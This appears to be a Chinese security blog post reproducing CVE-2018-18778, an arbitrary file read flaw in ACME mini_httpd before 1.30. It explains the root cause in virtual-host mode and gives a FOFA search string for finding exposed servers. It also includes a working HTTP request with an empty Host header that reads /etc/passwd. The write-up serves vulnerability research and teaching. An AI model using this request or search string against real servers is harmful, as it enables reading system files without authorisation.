中危 mini_httpd任意文件读取漏洞
ACME mini_httpd before 1.30
即1.30之前的ACME mini_httpd允许远程用户读取任意文件
app="ACME-mini_httpd"
- 漏洞复现 -
![知识分享1:[CVE-2018-18778]ACME Mini_httpd 任意文件读取漏洞(Web服务器漏洞)](http://cn-sec.com/wp-content/uploads/2023/06/8-1687942910.png "知识分享1:[CVE-2018-18778]ACME Mini_httpd 任意文件读取漏洞(Web服务器漏洞)")
在mini_httpd开启虚拟主机模式的情况下,用户请求http://HOST/FILE将会访问到当前目录下的HOST/FILE文件。
(void) snprintf( vfile, sizeof(vfile), "%s/%s", req_hostname, f );
当HOST=example.com、FILE=index.html的时候,上述语句结果为example.com/index.html,文件正常读取。
当HOST为空、FILE=etc/passwd的时候,上述语句结果为/etc/passwd。
GET/etc/passwdHTTP/1.1Host:Accept: text/plain, */*; q=0.01Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Content-Length: 0Referer: http://192.168.0.144:8080/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36x-requested-with: XMLHttpRequest
![知识分享1:[CVE-2018-18778]ACME Mini_httpd 任意文件读取漏洞(Web服务器漏洞)](http://cn-sec.com/wp-content/uploads/2023/06/1-1687942912.png "知识分享1:[CVE-2018-18778]ACME Mini_httpd 任意文件读取漏洞(Web服务器漏洞)")
- Referneces -
https://avd.aliyun.com/detail?id=AVD-2018-18778
http://www.acme.com/software/mini_httpd/
end
原文始发于微信公众号(安全攻防渗透):知识分享1:[CVE-2018-18778]ACME Mini_httpd 任意文件读取漏洞(Web服务器漏洞)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论